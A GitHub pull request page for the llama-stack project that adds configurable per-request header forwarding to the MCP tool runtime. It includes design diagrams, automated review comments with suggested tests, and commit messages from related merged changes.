add forward_headers passthrough to remote::model-context-protocol#2
add forward_headers passthrough to remote::model-context-protocol#2
Conversation
Reviewer's GuideAdds configurable per-request header forwarding to the remote model-context-protocol tool runtime, reusing a shared forward_headers utility and aligning MCP behavior with the existing inference/safety passthrough patterns while preserving backward compatibility with legacy mcp_headers and auth handling. Sequence diagram for MCP tool invocation with forwarded headerssequenceDiagram
actor Agent
participant ModelContextProtocolImpl
participant ForwardHeadersUtils as ForwardHeadersUtils_build_forwarded_headers
participant LegacyHeaders as ModelContextProtocolImpl_get_headers_from_request
participant MCPClient as invoke_mcp_tool
participant MCPServer as Downstream_MCP_server
Agent->>ModelContextProtocolImpl: invoke_tool(tool_name, kwargs, authorization?)
activate ModelContextProtocolImpl
ModelContextProtocolImpl->>ModelContextProtocolImpl: _get_forwarded_headers_and_auth()
activate ForwardHeadersUtils
ModelContextProtocolImpl->>ForwardHeadersUtils: build_forwarded_headers(provider_data, config.forward_headers)
ForwardHeadersUtils-->>ModelContextProtocolImpl: forwarded_headers
deactivate ForwardHeadersUtils
ModelContextProtocolImpl->>ModelContextProtocolImpl: split Authorization from forwarded_headers
ModelContextProtocolImpl-->>ModelContextProtocolImpl: forwarded_headers_no_auth, forwarded_auth
ModelContextProtocolImpl->>LegacyHeaders: get_headers_from_request(endpoint)
activate LegacyHeaders
LegacyHeaders-->>ModelContextProtocolImpl: legacy_headers (from mcp_headers)
deactivate LegacyHeaders
ModelContextProtocolImpl-->>ModelContextProtocolImpl: merged_headers = forwarded_headers_no_auth + legacy_headers
ModelContextProtocolImpl-->>ModelContextProtocolImpl: effective_auth = authorization param or forwarded_auth
ModelContextProtocolImpl->>MCPClient: invoke_mcp_tool(endpoint, tool_name, kwargs, headers=merged_headers, authorization=effective_auth)
activate MCPClient
MCPClient->>MCPServer: HTTP request with merged_headers and Authorization
MCPServer-->>MCPClient: HTTP response
MCPClient-->>ModelContextProtocolImpl: result
deactivate MCPClient
ModelContextProtocolImpl-->>Agent: tool result
deactivate ModelContextProtocolImpl
Sequence diagram for inference passthrough with forwarded headers and API key precedencesequenceDiagram
actor Client
participant InferenceAdapter as PassthroughInferenceAdapter
participant ForwardHeadersUtils as ForwardHeadersUtils_build_forwarded_headers
participant OpenAI as AsyncOpenAI_client
participant Downstream as Downstream_inference_service
Client->>InferenceAdapter: openai_completion(...)
activate InferenceAdapter
InferenceAdapter->>InferenceAdapter: _get_openai_client()
InferenceAdapter->>InferenceAdapter: _build_request_headers()
InferenceAdapter->>ForwardHeadersUtils: build_forwarded_headers(provider_data, config.forward_headers)
activate ForwardHeadersUtils
ForwardHeadersUtils-->>InferenceAdapter: forwarded_headers
deactivate ForwardHeadersUtils
InferenceAdapter->>InferenceAdapter: _get_passthrough_api_key_or_none(provider_data?)
InferenceAdapter-->>InferenceAdapter: api_key_or_none
alt static_or_per_request_api_key_present
InferenceAdapter-->>InferenceAdapter: drop forwarded Authorization variants
InferenceAdapter-->>InferenceAdapter: headers[Authorization] = Bearer api_key
end
InferenceAdapter-->>InferenceAdapter: request_headers
InferenceAdapter->>OpenAI: create AsyncOpenAI(base_url, api_key="", default_headers=request_headers)
activate OpenAI
InferenceAdapter->>OpenAI: chat.completions.create(...)
OpenAI->>Downstream: HTTP request with request_headers
Downstream-->>OpenAI: HTTP response
OpenAI-->>InferenceAdapter: completion
deactivate OpenAI
InferenceAdapter-->>Client: completion
deactivate InferenceAdapter
Class diagram for forward_headers configs and utilitiesclassDiagram
class MCPProviderDataValidator {
+ConfigDict model_config
+dict~str, dict~str, str~~ mcp_headers
}
class MCPProviderConfig {
+ConfigDict model_config
+dict~str, str~ forward_headers
+list~str~ extra_blocked_headers
+sample_run_config(forward_headers, extra_blocked_headers, _kwargs) dict~str, Any~
+validate_forward_headers() MCPProviderConfig
}
class PassthroughImplConfig {
+HttpUrl base_url
+SecretStr auth_credential
+dict~str, str~ forward_headers
+list~str~ extra_blocked_headers
+validate_forward_headers() PassthroughImplConfig
+sample_run_config(base_url, api_key, forward_headers, extra_blocked_headers, kwargs) dict~str, Any~
}
class PassthroughProviderDataValidator_inference {
+ConfigDict model_config
+HttpUrl passthrough_url
+SecretStr passthrough_api_key
}
class PassthroughSafetyConfig {
+HttpUrl base_url
+SecretStr api_key
+dict~str, str~ forward_headers
+list~str~ extra_blocked_headers
+validate_forward_headers() PassthroughSafetyConfig
+sample_run_config(base_url, api_key, forward_headers, extra_blocked_headers, kwargs) dict~str, Any~
}
class PassthroughProviderDataValidator_safety {
+ConfigDict model_config
+SecretStr passthrough_api_key
}
class PassthroughInferenceAdapter {
+PassthroughImplConfig config
+initialize() None
+_get_openai_client() AsyncOpenAI
+_build_request_headers() dict~str, str~
+_get_passthrough_api_key_or_none(provider_data) str
+_get_passthrough_url() str
}
class PassthroughSafetyAdapter {
+PassthroughSafetyConfig config
+_get_api_key() str
+_build_forward_headers() dict~str, str~
+_build_request_headers() dict~str, str~
}
class ModelContextProtocolImpl {
+MCPProviderConfig config
+_get_forwarded_headers_and_auth() tuple~dict~str, str~, str~
+get_headers_from_request(mcp_endpoint_uri) dict~str, str~
+list_runtime_tools(mcp_endpoint, authorization) ListToolDefsResponse
+invoke_tool(tool_name, kwargs, authorization) Any
}
class ForwardHeadersUtils {
+CORE_BLOCKED_FORWARD_HEADERS : frozenset~str~
+normalize_header_name(header_name) str
+is_valid_header_name(header_name) bool
+get_effective_blocked_forward_headers(extra_blocked_headers) frozenset~str~
+validate_forward_headers_config(forward_headers, extra_blocked_headers) None
+build_forwarded_headers(provider_data, forward_headers) dict~str, str~
}
MCPProviderConfig ..> ForwardHeadersUtils : uses
PassthroughImplConfig ..> ForwardHeadersUtils : uses
PassthroughSafetyConfig ..> ForwardHeadersUtils : uses
PassthroughInferenceAdapter --> PassthroughImplConfig : has
PassthroughSafetyAdapter --> PassthroughSafetyConfig : has
ModelContextProtocolImpl --> MCPProviderConfig : has
PassthroughInferenceAdapter ..> PassthroughProviderDataValidator_inference : reads provider_data
PassthroughSafetyAdapter ..> PassthroughProviderDataValidator_safety : reads provider_data
ModelContextProtocolImpl ..> MCPProviderDataValidator : reads provider_data
PassthroughImplConfig --|> RemoteInferenceProviderConfig
PassthroughSafetyAdapter --|> Safety
PassthroughInferenceAdapter --|> Inference
ModelContextProtocolImpl --|> NeedsRequestProviderData
File-Level Changes
Tips and commandsInteracting with Sourcery
Customizing Your ExperienceAccess your dashboard to:
Getting Help
|
There was a problem hiding this comment.
Hey - I've found 2 issues, and left some high level feedback:
- The warning about
forward_headersbeing configured but yielding no matching provider-data keys is now duplicated in multiple adapters (inference,safety, MCP); consider centralizing this into a small helper aroundbuild_forwarded_headersso the log message and behavior stay consistent in one place. - In
build_forwarded_headers, you recomputelen(sanitized.encode())when logging the oversize warning; you could compute it once into a local variable to avoid double encoding and make the intent clearer.
Prompt for AI Agents
Please address the comments from this code review:
## Overall Comments
- The warning about `forward_headers` being configured but yielding no matching provider-data keys is now duplicated in multiple adapters (`inference`, `safety`, MCP); consider centralizing this into a small helper around `build_forwarded_headers` so the log message and behavior stay consistent in one place.
- In `build_forwarded_headers`, you recompute `len(sanitized.encode())` when logging the oversize warning; you could compute it once into a local variable to avoid double encoding and make the intent clearer.
## Individual Comments
### Comment 1
<location path="tests/integration/tool_runtime/test_passthrough_mcp.py" line_range="183" />
<code_context>
+# ---------------------------------------------------------------------------
+
+
+class TestListRuntimeToolsWiring:
+ async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch):
+ """forward_headers config causes headers to be passed to list_mcp_tools."""
</code_context>
<issue_to_address>
**suggestion (testing):** Missing tests for interaction between forward_headers and legacy mcp_headers merging in list_runtime_tools
These tests only cover the forwarded-headers path and the no-headers case. Please add a test that:
- Sets `mcp_headers` in the provider data for an endpoint.
- Configures `forward_headers` (e.g. `"tid" -> "X-Tenant-ID"`).
- Asserts that `list_runtime_tools` passes a merged headers dict to `list_mcp_tools`, with the correct precedence between legacy and forwarded headers.
This will validate the backward-compatible path and ensure the new merge logic doesn’t drop or wrongly override legacy headers.
Suggested implementation:
```python
class TestListRuntimeToolsWiring:
async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch):
"""forward_headers config causes headers to be passed to list_mcp_tools."""
from llama_stack_api import URL
impl = _make_impl(forward_headers={"tid": "X-Tenant-ID"})
impl.get_request_provider_data = MagicMock(
return_value=_make_provider_data(tid="acme")
) # type: ignore[method-assign]
captured: dict[str, Any] = {}
async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
captured["headers"] = headers
captured["authorization"] = authorization
# Wire our fake into the runtime impl
monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)
# Exercise list_runtime_tools; this should compute forwarded headers
await impl.list_runtime_tools(URL("https://example.com/mcp"))
# We only care that the forwarded header mapping is honored
assert captured["headers"] == {"X-Tenant-ID": "acme"}
async def test_forwarded_and_legacy_mcp_headers_are_merged(self, monkeypatch):
"""forward_headers and legacy mcp_headers are merged with legacy taking precedence."""
from llama_stack_api import URL
# Map request headers -> MCP headers
impl = _make_impl(
forward_headers={
"tid": "X-Tenant-ID",
"org": "X-Org-ID",
}
)
# Legacy MCP headers configured on the provider
legacy_mcp_headers = {
"X-Tenant-ID": "legacy-tenant", # should win over forwarded value
"X-Static": "static-value",
}
# Request-scoped headers (available for forwarding)
impl.get_request_provider_data = MagicMock(
return_value=_make_provider_data(
tid="forwarded-tenant",
org="acme-org",
mcp_headers=legacy_mcp_headers,
)
) # type: ignore[method-assign]
captured: dict[str, Any] = {}
async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
captured["headers"] = headers
captured["authorization"] = authorization
# Wire our fake into the runtime impl
monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)
# Exercise list_runtime_tools; this should merge forwarded and legacy headers
await impl.list_runtime_tools(URL("https://example.com/mcp"))
# Expected behavior:
# - Non-overlapping forwarded headers are included.
# - Overlapping keys are resolved in favor of legacy mcp_headers (backward compatible).
assert captured["headers"] == {
"X-Tenant-ID": "legacy-tenant", # legacy wins
"X-Static": "static-value",
"X-Org-ID": "acme-org", # only comes from forwarded headers
}
```
I had to reconstruct parts of the existing `test_forwarded_headers_passed_to_list_mcp_tools` body and the wiring to `impl.runtime.list_mcp_tools` / `impl.list_runtime_tools` based on the incomplete snippet.
To integrate this cleanly, please:
1. Align the use of `URL("https://example.com/mcp")` and the `impl.list_runtime_tools(...)` call with how other tests in this file currently invoke `list_runtime_tools` (e.g., if they pass an endpoint ID or different argument shape, mirror that instead).
2. Ensure `_make_provider_data(...)` actually accepts an `mcp_headers` keyword argument and that it places those headers where `list_runtime_tools` expects to find legacy MCP headers. If the shape differs (e.g., nested under a specific endpoint key), adapt the `return_value` accordingly.
3. If `impl.runtime.list_mcp_tools` lives under a different attribute path or module in your codebase, adjust the `monkeypatch.setattr(...)` calls to match the actual location.
4. If your existing `test_forwarded_headers_passed_to_list_mcp_tools` already has more assertions or setup not visible in the snippet, merge those back into the reconstructed body above so no coverage is lost.
</issue_to_address>
### Comment 2
<location path="tests/integration/tool_runtime/test_passthrough_mcp.py" line_range="263" />
<code_context>
+# ---------------------------------------------------------------------------
+
+
+class TestInvokeToolWiring:
+ async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch):
+ """forward_headers config causes headers to be passed to invoke_mcp_tool."""
</code_context>
<issue_to_address>
**suggestion (testing):** Consider adding a test that legacy mcp_headers are still honored in invoke_tool alongside forwarded headers
Right now this only exercises the `forwarded_headers` path. Please add a test where `provider_data.mcp_headers` is set for the tool endpoint and `forward_headers` also injects a header, then assert that `invoke_mcp_tool` sees both and that the intended precedence between them is preserved. This will cover the backward-compatible headers behavior in `invoke_tool`.
Suggested implementation:
```python
# ---------------------------------------------------------------------------
# invoke_tool wiring tests
# ---------------------------------------------------------------------------
class TestInvokeToolWiring:
async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch):
"""forward_headers config causes headers to be passed to invoke_mcp_tool."""
impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})
impl.get_request_provider_data = MagicMock(
return_value=_make_provider_data(tid="acme", tok="my-token")
) # type: ignore[method-assign]
# mock tool_store
fake_tool = MagicMock()
fake_tool.metadata = {"endpoint": "http://mcp-server:8080/sse"}
impl.tool_store = AsyncMock()
impl.tool_store.get_tool.return_value = fake_tool
captured: dict[str, Any] = {}
async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any: # pragma: no cover - trivial passthrough
captured["headers"] = kwargs.get("headers")
impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)
await impl.invoke_tool(
tool_name="some-tool",
arguments={},
metadata={},
)
assert captured["headers"] == {
"X-Tenant-ID": "acme",
"Authorization": "my-token",
}
async def test_forwarded_and_legacy_mcp_headers_are_merged_and_forwarded_headers_take_precedence(
self,
monkeypatch: Any,
) -> None:
"""Both legacy mcp_headers and forward_headers are honored; forward_headers take precedence."""
impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})
endpoint = "http://mcp-server:8080/sse"
# Legacy mcp_headers for this endpoint
legacy_mcp_headers = {
"Authorization": "legacy-token",
"X-Legacy": "legacy-value",
}
# Request-scoped headers that will be forwarded according to forward_headers
request_headers = {
"tid": "acme",
"tok": "forward-token",
}
provider_data = SimpleNamespace(
headers=request_headers,
mcp_headers={endpoint: legacy_mcp_headers},
)
impl.get_request_provider_data = MagicMock(return_value=provider_data) # type: ignore[method-assign]
# mock tool_store
fake_tool = MagicMock()
fake_tool.metadata = {"endpoint": endpoint}
impl.tool_store = AsyncMock()
impl.tool_store.get_tool.return_value = fake_tool
captured: dict[str, Any] = {}
async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any: # pragma: no cover - trivial passthrough
captured["headers"] = kwargs.get("headers")
impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)
await impl.invoke_tool(
tool_name="some-tool",
arguments={},
metadata={},
)
# Expect:
# - legacy mcp_headers are present
# - forwarded headers are added
# - for overlapping keys (e.g. Authorization) forwarded headers win
assert captured["headers"] == {
"X-Tenant-ID": "acme", # from forward_headers mapping tid -> X-Tenant-ID
"Authorization": "forward-token", # forwarded value overrides legacy mcp_headers.Authorization
"X-Legacy": "legacy-value", # preserved from legacy mcp_headers
}
```
1. Ensure `SimpleNamespace` is imported at the top of `tests/integration/tool_runtime/test_passthrough_mcp.py`, e.g.:
`from types import SimpleNamespace`.
2. If `impl.invoke_tool` uses different parameter names than `tool_name`, `arguments`, and `metadata`, adjust the call sites in both tests to match the actual signature used elsewhere in this test file.
3. If `get_request_provider_data` expects attributes other than `headers` and `mcp_headers`, extend the `SimpleNamespace` in the new test with those attributes as needed.
</issue_to_address>Help me be more useful! Please click 👍 or 👎 on each comment and I'll use the feedback to improve your reviews.
| # --------------------------------------------------------------------------- | ||
|
|
||
|
|
||
| class TestListRuntimeToolsWiring: |
There was a problem hiding this comment.
suggestion (testing): Missing tests for interaction between forward_headers and legacy mcp_headers merging in list_runtime_tools
These tests only cover the forwarded-headers path and the no-headers case. Please add a test that:
- Sets
mcp_headersin the provider data for an endpoint. - Configures
forward_headers(e.g."tid" -> "X-Tenant-ID"). - Asserts that
list_runtime_toolspasses a merged headers dict tolist_mcp_tools, with the correct precedence between legacy and forwarded headers.
This will validate the backward-compatible path and ensure the new merge logic doesn’t drop or wrongly override legacy headers.
Suggested implementation:
class TestListRuntimeToolsWiring:
async def test_forwarded_headers_passed_to_list_mcp_tools(self, monkeypatch):
"""forward_headers config causes headers to be passed to list_mcp_tools."""
from llama_stack_api import URL
impl = _make_impl(forward_headers={"tid": "X-Tenant-ID"})
impl.get_request_provider_data = MagicMock(
return_value=_make_provider_data(tid="acme")
) # type: ignore[method-assign]
captured: dict[str, Any] = {}
async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
captured["headers"] = headers
captured["authorization"] = authorization
# Wire our fake into the runtime impl
monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)
# Exercise list_runtime_tools; this should compute forwarded headers
await impl.list_runtime_tools(URL("https://example.com/mcp"))
# We only care that the forwarded header mapping is honored
assert captured["headers"] == {"X-Tenant-ID": "acme"}
async def test_forwarded_and_legacy_mcp_headers_are_merged(self, monkeypatch):
"""forward_headers and legacy mcp_headers are merged with legacy taking precedence."""
from llama_stack_api import URL
# Map request headers -> MCP headers
impl = _make_impl(
forward_headers={
"tid": "X-Tenant-ID",
"org": "X-Org-ID",
}
)
# Legacy MCP headers configured on the provider
legacy_mcp_headers = {
"X-Tenant-ID": "legacy-tenant", # should win over forwarded value
"X-Static": "static-value",
}
# Request-scoped headers (available for forwarding)
impl.get_request_provider_data = MagicMock(
return_value=_make_provider_data(
tid="forwarded-tenant",
org="acme-org",
mcp_headers=legacy_mcp_headers,
)
) # type: ignore[method-assign]
captured: dict[str, Any] = {}
async def fake_list_mcp_tools(endpoint, headers=None, authorization=None, **_):
captured["headers"] = headers
captured["authorization"] = authorization
# Wire our fake into the runtime impl
monkeypatch.setattr(impl.runtime, "list_mcp_tools", fake_list_mcp_tools)
# Exercise list_runtime_tools; this should merge forwarded and legacy headers
await impl.list_runtime_tools(URL("https://example.com/mcp"))
# Expected behavior:
# - Non-overlapping forwarded headers are included.
# - Overlapping keys are resolved in favor of legacy mcp_headers (backward compatible).
assert captured["headers"] == {
"X-Tenant-ID": "legacy-tenant", # legacy wins
"X-Static": "static-value",
"X-Org-ID": "acme-org", # only comes from forwarded headers
}I had to reconstruct parts of the existing test_forwarded_headers_passed_to_list_mcp_tools body and the wiring to impl.runtime.list_mcp_tools / impl.list_runtime_tools based on the incomplete snippet.
To integrate this cleanly, please:
- Align the use of
URL("https://example.com/mcp")and theimpl.list_runtime_tools(...)call with how other tests in this file currently invokelist_runtime_tools(e.g., if they pass an endpoint ID or different argument shape, mirror that instead). - Ensure
_make_provider_data(...)actually accepts anmcp_headerskeyword argument and that it places those headers wherelist_runtime_toolsexpects to find legacy MCP headers. If the shape differs (e.g., nested under a specific endpoint key), adapt thereturn_valueaccordingly. - If
impl.runtime.list_mcp_toolslives under a different attribute path or module in your codebase, adjust themonkeypatch.setattr(...)calls to match the actual location. - If your existing
test_forwarded_headers_passed_to_list_mcp_toolsalready has more assertions or setup not visible in the snippet, merge those back into the reconstructed body above so no coverage is lost.
| # --------------------------------------------------------------------------- | ||
|
|
||
|
|
||
| class TestInvokeToolWiring: |
There was a problem hiding this comment.
suggestion (testing): Consider adding a test that legacy mcp_headers are still honored in invoke_tool alongside forwarded headers
Right now this only exercises the forwarded_headers path. Please add a test where provider_data.mcp_headers is set for the tool endpoint and forward_headers also injects a header, then assert that invoke_mcp_tool sees both and that the intended precedence between them is preserved. This will cover the backward-compatible headers behavior in invoke_tool.
Suggested implementation:
# ---------------------------------------------------------------------------
# invoke_tool wiring tests
# ---------------------------------------------------------------------------
class TestInvokeToolWiring:
async def test_forwarded_headers_passed_to_invoke_mcp_tool(self, monkeypatch):
"""forward_headers config causes headers to be passed to invoke_mcp_tool."""
impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})
impl.get_request_provider_data = MagicMock(
return_value=_make_provider_data(tid="acme", tok="my-token")
) # type: ignore[method-assign]
# mock tool_store
fake_tool = MagicMock()
fake_tool.metadata = {"endpoint": "http://mcp-server:8080/sse"}
impl.tool_store = AsyncMock()
impl.tool_store.get_tool.return_value = fake_tool
captured: dict[str, Any] = {}
async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any: # pragma: no cover - trivial passthrough
captured["headers"] = kwargs.get("headers")
impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)
await impl.invoke_tool(
tool_name="some-tool",
arguments={},
metadata={},
)
assert captured["headers"] == {
"X-Tenant-ID": "acme",
"Authorization": "my-token",
}
async def test_forwarded_and_legacy_mcp_headers_are_merged_and_forwarded_headers_take_precedence(
self,
monkeypatch: Any,
) -> None:
"""Both legacy mcp_headers and forward_headers are honored; forward_headers take precedence."""
impl = _make_impl(forward_headers={"tid": "X-Tenant-ID", "tok": "Authorization"})
endpoint = "http://mcp-server:8080/sse"
# Legacy mcp_headers for this endpoint
legacy_mcp_headers = {
"Authorization": "legacy-token",
"X-Legacy": "legacy-value",
}
# Request-scoped headers that will be forwarded according to forward_headers
request_headers = {
"tid": "acme",
"tok": "forward-token",
}
provider_data = SimpleNamespace(
headers=request_headers,
mcp_headers={endpoint: legacy_mcp_headers},
)
impl.get_request_provider_data = MagicMock(return_value=provider_data) # type: ignore[method-assign]
# mock tool_store
fake_tool = MagicMock()
fake_tool.metadata = {"endpoint": endpoint}
impl.tool_store = AsyncMock()
impl.tool_store.get_tool.return_value = fake_tool
captured: dict[str, Any] = {}
async def _capture_invoke_mcp_tool(*args: Any, **kwargs: Any) -> Any: # pragma: no cover - trivial passthrough
captured["headers"] = kwargs.get("headers")
impl.runtime_handler.invoke_mcp_tool = AsyncMock(side_effect=_capture_invoke_mcp_tool)
await impl.invoke_tool(
tool_name="some-tool",
arguments={},
metadata={},
)
# Expect:
# - legacy mcp_headers are present
# - forwarded headers are added
# - for overlapping keys (e.g. Authorization) forwarded headers win
assert captured["headers"] == {
"X-Tenant-ID": "acme", # from forward_headers mapping tid -> X-Tenant-ID
"Authorization": "forward-token", # forwarded value overrides legacy mcp_headers.Authorization
"X-Legacy": "legacy-value", # preserved from legacy mcp_headers
}- Ensure
SimpleNamespaceis imported at the top oftests/integration/tool_runtime/test_passthrough_mcp.py, e.g.:
from types import SimpleNamespace. - If
impl.invoke_tooluses different parameter names thantool_name,arguments, andmetadata, adjust the call sites in both tests to match the actual signature used elsewhere in this test file. - If
get_request_provider_dataexpects attributes other thanheadersandmcp_headers, extend theSimpleNamespacein the new test with those attributes as needed.
|
Recording workflow completed Providers: ollama Recordings have been generated and will be committed automatically by the companion workflow. |
…lamastack#5134) # What does this PR do? Adds per-request HTTP header forwarding to the `remote::passthrough` inference provider, following the pattern established by the safety passthrough provider (PR llamastack#5004, already merged). A `forward_headers` config field maps provider-data keys to outbound HTTP header names. Only explicitly listed keys are forwarded from `X-LlamaStack-Provider-Data` to the downstream service (default-deny). An `extra_blocked_headers` field lets operators add custom blocked names on top of the core security list. The shared utility `providers/utils/forward_headers.py` is used by both the inference and safety passthrough providers, keeping the forwarding logic and blocked-header policy in one place. Closes llamastack#5040 Relates llamastack#4607 ## Test Plan Unit tests cover the full path — config validation, header extraction, CRLF sanitization, blocked-header enforcement, auth priority chain, and concurrent request isolation: ```bash uv run pytest tests/unit/providers/inference/test_passthrough_forward_headers.py -v ``` Tests cover: - `build_forwarded_headers()` — key mapping, default-deny, CRLF stripping, SecretStr unwrap, case-insensitive dedup - `validate_forward_headers_config()` — blocked header rejection, operator extra blocklist, invalid names - Adapter auth priority — static api_key > passthrough_api_key > forwarded Authorization - Provider data validator — extra fields preserved for forwarding, reserved keys rejected - Concurrent request isolation — contextvars don't leak between parallel requests Also tested end-to-end locally against a mock inference server and a mock `/v1/moderations` server. Headers land on the downstream exactly as configured and blocked headers are rejected at stack startup, not at request time. Example config: ```yaml providers: inference: - provider_id: maas-inference provider_type: remote::passthrough config: base_url: ${env.PASSTHROUGH_URL} forward_headers: maas_api_token: "Authorization" tenant_id: "X-Tenant-ID" ``` Callers pass credentials via `X-LlamaStack-Provider-Data`: ```bash curl http://localhost:8321/v1/chat/completions \ -H 'X-LlamaStack-Provider-Data: {"maas_api_token": "Bearer user-jwt", "tenant_id": "acme"}' \ -d '{"model": "passthrough/my-model", "messages": [{"role": "user", "content": "hello"}]}' ``` The downstream receives `Authorization: Bearer user-jwt` and `X-Tenant-ID: acme`. Only keys explicitly listed in `forward_headers` are forwarded to the downstream service. Any keys in `X-LlamaStack-Provider-Data` that don't have a mapping in `forward_headers` are ignored — they never leave the stack. This is the default-deny policy: if it's not in the config, it doesn't get forwarded.
bfbfeb5 to
a07a34e
Compare
) ## Summary - Add Bedrock (`bedrock/openai.gpt-oss-20b`) to the responses test suite in CI - Pre-register the Bedrock model in the ci-tests distribution config - Include ~330 newly recorded Bedrock response test recordings (104 passing, 87% coverage) - Update the provider compatibility matrix to reflect Bedrock coverage ## Test plan - [x] CI replay tests pass for Bedrock responses suite - [x] Provider compatibility matrix renders correctly with Bedrock column - [ ] Provider record job works --------- Co-authored-by: Sébastien Han <seb@redhat.com>
…ng (llamastack#5265) # What does this PR do? Add .pytest_cache/, .mypy_cache/, htmlcov/, *.log, *.swp, *.swo, and *.tsbuildinfo to cover common editor, test, and build artifacts missing from the standard Python/TypeScript gitignore templates. Improves AgentReady .gitignore_completeness score from 61 to 89/100 (Threshold: ≥70) Signed-off-by: Eleanor Hu <ehu@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>
…5251) Adds conventional-pre-commit hook to enforce conventional commit format. - Recognized by agentready conventional_commits test Signed-off-by: Derek Higgins <derekh@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>
## Summary - The `test_openai_chat_completion_is_async` test intermittently fails on CI runners due to a tight timing assertion (2x multiplier on 0.5s sleep) - Increases the multiplier from 2x to 3x (1.5s threshold), which still validates concurrency (sequential would be 2.0s) while tolerating CI jitter - Fixes flake seen in https://github.com/llamastack/llama-stack/actions/runs/23495075039 ## Test plan - [x] Verified the threshold still validates concurrency: 4 parallel 0.5s sleeps must complete in < 1.5s (sequential would take 2.0s) - [ ] CI unit tests pass without flaking Signed-off-by: Charlie Doern <cdoern@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>
9410037 to
c430e0d
Compare
# What does this PR do? Trim README for clarity and structure - Add table of contents - Fix heading hierarchy (H3 → H2 throughout) - Merge related sections (Documentation + Client SDKs → Resources; Community + Star History + Contributors) - Fold one-line installer into Overview, remove redundant Benefits sub-section - Tighten prose throughout Improves AgentReady Concise Documentation score from 69 to 85/100 (Threshold: ≥75) Signed-off-by: Eleanor Hu <ehu@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>
c430e0d to
d8f03a9
Compare
Fixed llamastack#5256 # What does this PR do? <!-- Provide a short summary of what this PR does and why. Link to relevant issues if applicable. --> <!-- If resolving an issue, uncomment and update the line below --> Add OpenTelemetry metrics to track which optional parameters callers explicitly provide in Responses API (`POST /v1/responses`) requests. This helps understand API usage patterns and prioritize OpenAI parity work. introduced new counter metric `llama_stack.responses.parameter_usage_total` with `operation` and `parameter` attributes For a request like: ```bash curl -X POST http://localhost:8321/v1/responses \ -H 'Content-Type: application/json' \ -d '{ "input": "What is Python?", "model": "ollama/llama3.2:3b-instruct-fp16", "temperature": 0.7, "stream": true, "tools": [], "instructions": "Be concise" }' ``` The following Prometheus metrics are emitted: ``` llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="temperature"} 1 llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="stream"} 1 llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="tools"} 1 llama_stack_llama_stack_responses_parameter_usage_total{operation="create_response", parameter="instructions"} 1 ``` ```console (llama-stack) gualiu@gualiu-mac llama-stack % curl -s 'http://localhost:9090/api/v1/query?query=llama_stack_llama_stack_responses_parameter_usage_total' | jq { "status": "success", "data": { "resultType": "vector", "result": [ { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "instructions" }, "value": [ 1774293626.183, "7" ] }, { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "stream" }, "value": [ 1774293626.183, "7" ] }, { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "temperature" }, "value": [ 1774293626.183, "4" ] }, { "metric": { "__name__": "llama_stack_llama_stack_responses_parameter_usage_total", "exported_job": "llama-stack-server", "instance": "otel-collector:9464", "job": "otel-collector", "operation": "create_response", "otel_scope_name": "llama_stack.responses", "otel_scope_version": "1.0.0", "parameter": "tools" }, "value": [ 1774293626.183, "4" ] } ] } } ``` Co-authored-by: Sébastien Han <seb@redhat.com>
d8f03a9 to
f04296b
Compare
…ck#5271) - Adds a `markdownlint-cli` pre-commit hook with `--fix` to enforce consistent markdown style across the repository - Fixes all existing violations across 75 files, one rule enabled per commit for easier review - Updates Jinja doc templates (`dell`, `nvidia`, `oci`) and codegen scripts (`provider_compat_matrix.py`) to ensure generated docs converge with markdownlint ### Commit-by-commit rule fixes 1. **MD003** — heading style consistency (atx, no closing hashes) 2. **MD024** — no duplicate sibling headings 3. **MD045** — image alt text 4. **MD051** — valid link fragments 5. **MD025** — single top-level heading per document 6. **MD055** — consistent table pipe style 7. **MD059** — descriptive link text (no bare `[here]` links) 8. **MD001** — heading level increment 9. **MD036** — no emphasis as heading (with `markdownlint-disable` for legitimate uses) 10. **MD040** — fenced code blocks must have language specified ### Permanently disabled rules | Rule | Reason | |------|--------| | MD013 | Line length — URLs, badges, and tables often exceed any reasonable limit | | MD033 | Inline HTML — project uses `<details>`, `<summary>`, and other HTML | | MD041 | First line heading — generated reports and some docs don't follow this | | MD060 | Table column style — cosmetic pipe alignment, not auto-fixable, 300+ violations | ## 